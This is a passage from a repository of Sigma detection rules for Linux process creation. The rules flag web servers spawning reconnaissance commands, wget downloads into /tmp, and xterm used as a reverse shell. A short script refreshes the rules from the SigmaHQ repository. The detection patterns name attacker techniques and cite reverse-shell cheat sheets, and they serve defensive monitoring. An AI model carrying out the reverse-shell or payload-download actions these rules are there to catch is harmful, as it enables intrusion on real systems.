14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_general: 19 | ParentImage|endswith: 20 | - '/httpd' 21 | - '/lighttpd' 22 | - '/nginx' 23 | - '/apache2' 24 | - '/node' 25 | - '/caddy' 26 | selection_tomcat: 27 | ParentCommandLine|contains|all: 28 | - '/bin/java' 29 | - 'tomcat' 30 | selection_websphere: # ? just guessing 31 | ParentCommandLine|contains|all: 32 | - '/bin/java' 33 | - 'websphere' 34 | sub_processes: 35 | Image|endswith: 36 | - '/whoami' 37 | - '/ifconfig' 38 | - '/ip' 39 | - '/bin/uname' 40 | - '/bin/cat' 41 | - '/bin/crontab' 42 | - '/hostname' 43 | - '/iptables' 44 | - '/netstat' 45 | - '/pwd' 46 | - '/route' 47 | condition: 1 of selection_* and sub_processes 48 | falsepositives: 49 | - Web applications that invoke Linux command line tools 50 | level: high 51 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml: -------------------------------------------------------------------------------- 1 | title: Download File To Potentially Suspicious Directory Via Wget 2 | id: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4 3 | status: experimental 4 | description: Detects the use of wget to download content to a suspicious directory 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.command_and_control 14 | - attack.t1105 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection_img: 20 | Image|endswith: '/wget' 21 | selection_output: 22 | - CommandLine|re: '\s-O\s' # We use regex to ensure a case sensitive argument detection 23 | - CommandLine|contains: '--output-document' 24 | selection_path: 25 | CommandLine|contains: '/tmp/' 26 | condition: all of selection_* 27 | falsepositives: 28 | - Unknown 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Xterm Reverse Shell 2 | id: 4e25af4b-246d-44ea-8563-e42aacab006b 3 | status: experimental 4 | description: Detects usage of "xterm" as a potential reverse shell tunnel 5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | author: '@d4ns4n_' 9 | date: 2023/04/24 10 | tags: 11 | - attack.execution 12 | - attack.t1059 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|contains: 'xterm' 19 | CommandLine|contains: '-display' 20 | CommandLine|endswith: ':1' 21 | condition: selection 22 | falsepositives: 23 | - Unknown 24 | level: medium 25 | -------------------------------------------------------------------------------- /update-rules.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | echo 'updating sigma rules started' 4 | git clone https://github.com/SigmaHQ/sigma.git 5 | rm -r ./rules/ 6 | mkdir ./rules/ 7 | mv ./sigma/rules/linux/ ./rules/ 8 | rm -r ./sigma/ 9 | echo 'updating sigma rules done' 10 | --------------------------------------------------------------------------------